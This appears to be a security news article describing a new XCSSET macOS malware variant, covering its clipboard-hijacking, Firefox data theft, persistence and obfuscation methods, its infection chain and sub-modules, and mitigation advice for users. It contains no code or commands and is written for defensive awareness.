Cybersecurity experts have identified a new iteration of the XCSSET malware, a sophisticated threat targeting macOS systems. This variant introduces advanced techniques in browser exploitation, clipboard manipulation, and persistence, posing significant risks to users.
Background on XCSSET
First documented in August 2020, XCSSET is a modular malware known for infecting Xcode projects. By embedding malicious code into these projects, the malware activates during the build process, compromising developers’ systems. The exact distribution method remains unclear, but it’s believed that the malware spreads through shared Xcode project files among developers.
Recent Developments
In March 2025, Microsoft reported enhancements to XCSSET, including improved error handling and multiple persistence techniques aimed at extracting sensitive data from infected systems. The latest variant builds upon these features, introducing more sophisticated methods to evade detection and maintain control over compromised devices.
Key Features of the New Variant
1. Clipboard Hijacking (Clipper Module): The malware now includes a clipper module that monitors clipboard content for cryptocurrency wallet addresses. When such an address is detected, the malware replaces it with one controlled by the attacker, redirecting funds during transactions.
2. Enhanced Browser Targeting: The malware has expanded its data exfiltration capabilities to include Mozilla Firefox. It employs a modified version of the publicly available tool HackBrowserData to steal sensitive information from Firefox users.
3. Advanced Persistence Mechanisms: Beyond previous methods, the malware now establishes persistence through LaunchDaemon entries, ensuring it remains active even after system reboots.
4. Sophisticated Obfuscation Techniques: The malware utilizes run-only compiled AppleScripts and advanced encryption methods to conceal its activities, making detection and analysis more challenging.
Infection Chain Analysis
The infection process involves multiple stages:
1. Initial Execution: When a developer builds an infected Xcode project, a shell payload executes, downloading an obfuscated shell command.
2. System Information Collection: The shell command gathers operating system details and transmits them to a command-and-control (C2) server, which responds with an additional shell script payload.
3. Payload Deployment: The shell script checks the device’s XProtect version and creates an AppleScript-compiled application using `osacompile`.
4. Final Execution: The AppleScript application runs a shell command to obtain the final-stage AppleScript, responsible for collecting system information and launching various sub-modules.
Sub-Modules and Their Functions
– vexyeqj: Formerly known as seizecj, this module downloads and executes another module called bnk using `osascript`. It includes functions for data validation, encryption, decryption, fetching additional data from the C2 server, and logging. It also incorporates the clipper functionality.
– neq_cdyd_ilvcmwx: Similar to the previous txzx_vostfdi module, it exfiltrates files to the C2 server.
– xmyyeqjx: Sets up persistence using LaunchDaemon entries.
– jey: Establishes persistence through Git-based methods.
– iewmilh_cdyd: Steals data from Firefox using a modified version of HackBrowserData.
Implications for macOS Users
The evolution of XCSSET underscores the increasing sophistication of threats targeting macOS systems. The malware’s ability to hijack clipboard data, exploit popular browsers, and maintain persistence through advanced methods highlights the need for heightened vigilance among users.
Recommendations for Mitigation
– Regular System Updates: Ensure that macOS and all installed applications are up-to-date to benefit from the latest security patches.
– Cautious Project Handling: Thoroughly inspect and verify any Xcode projects downloaded or cloned from repositories before use.
– Clipboard Awareness: Be cautious when copying and pasting sensitive information, especially cryptocurrency wallet addresses.
– Trusted Sources: Only install applications from reputable sources, such as the official Mac App Store.
Conclusion
The latest XCSSET variant represents a significant advancement in macOS malware, employing sophisticated techniques to compromise systems and exfiltrate sensitive data. By staying informed and adopting proactive security measures, users can mitigate the risks associated with this evolving threat.
